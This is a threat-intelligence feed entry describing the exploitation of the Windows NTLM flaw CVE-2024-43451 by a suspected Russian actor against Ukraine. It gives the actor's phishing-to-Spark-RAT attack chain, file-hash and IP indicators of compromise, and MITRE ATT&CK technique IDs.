Russian Hackers Exploit New NTLM Flaw to Deploy RAT Malware via Phishing Emails

Nov. 14, 2024, 7:30 p.m.

Description

A newly discovered vulnerability in Windows NT LAN Manager (NTLM) has been exploited by suspected Russian hackers in cyber attacks against Ukraine. The flaw, identified as CVE-2024-43451, allows attackers to steal NTLMv2 hashes through minimal user interaction with malicious files. The exploit chain involves phishing emails containing links to compromised Ukrainian government websites, leading to the download of a ZIP archive with a malicious URL file. When interacted with, this file triggers the vulnerability and downloads additional payloads, including the Spark RAT malware. The attack also enables pass-the-hash attacks for unauthorized user authentication. Ukrainian CERT has attributed this activity to a threat actor known as UAC-0194.

External References

https://thehackernews.com/2024/11/russian-hackers-exploit-new-ntlm-flaw.html
https://otx.alienvault.com/pulse/6735e5b8f2bf83257176ebe5
Tags
rat
phishing
windows
russia
ukraine
zero-day
CVE-2024-43451
2024-11-14
ntlm
spark rat
pass-the-hash
hash stealing

Date

  • Created: Nov. 14, 2024, 11:57 a.m.
  • Published: Nov. 14, 2024, 11:57 a.m.
  • Modified: Nov. 14, 2024, 7:30 p.m.

Indicators

  • 994fa6d6b44379a8271e0936cf2a2e898de4f720ab8c1fec98be674f20df883d
  • 6ec7f86cc19df1fef8063242ef6861355cc7ed25a669de842e1cda7332eca343
  • e2ad6fa6dbe71e9ab10dcf3bad4b82538dabe34a3011fdaa2eeb302b67ea776d
  • 34073f2055002791ed3cad21be0e94b33ff4345eab8a5e7801dfdafa7cc2fb99
  • d6d77204740bd3bdd2fd5e918a7ba9134c1d7d10eb3d6972749009dd50df6cc8
  • 6de2602f486985bfadae3b4ac06af041f22fd41559954a6ecd262f7c3a8aa681
  • ad10aaac2661b2dd17ef586a2bf8f3dca7a82abda2580dbd3aca2d52cc5460ae
  • 5499a4bf696fdbbe41cdc2bc9efae2df93306a135643a3651701c5ca57570eb7
  • 8cf24fe1384ca8ea763081b78fd14995704bbd73a871ebe1c362053767aeec20
  • caba3a8900302df5b83d260ed1f4da19b68f8c2d1b92c6dfc91b2ca01f14a1ef
  • c423ea5a16e33d3b988358ad649bb43a3265cad8e118ed91863d8b9dc3e8f8f9
  • 715a69b898bd0a056098d24505046391e29381f671952d5e860c0cb41779a49f
  • e4a6368556c15d316960bd605827c00e336ef6e56c369090803a46ff69dfd4ac
  • 928cdef8fb7c2ba9aa96ab726d74aa7a18b032102d9ec4ed00e7559f98c1bdf9
  • df74298b2ecb33558bd34b7d59bcade5901eb5db1b61ce9aa1ae27e597f4f58d
  • 6c6ba73e4c80853219121f922e60564720d414bf42d8bc542dac800560d1eb36
  • 0efe4a603dd59b377798ae2889fe47a851f79e36d1a925d327a93416204d1767
  • 07b417ffa08f12201eceba3688690bd5c947f657be00e3c883f6ec342ec5c344
  • aac3f49b8c875ca842f96dd6dde194102944907a956fad1ff1cff14c64aaf2e0
  • 77.83.172.47
  • 89.23.101.101
  • 89.23.102.251
  • 92.42.96.30
  • 92.42.96.10
Download all indicators here!

Attack Patterns

  • Spark RAT
  • UAC-0194
  • T1053.005
  • T1574.002
  • T1571
  • T1547.001
  • T1070.004
  • T1573
  • T1218
  • T1105
  • T1566.001
  • T1055
  • T1219
  • T1036
  • T1204
  • T1140
  • T1027
  • T1112
  • T1566
  • T1078
  • T1059

Additional Informations

  • Government
  • Ukraine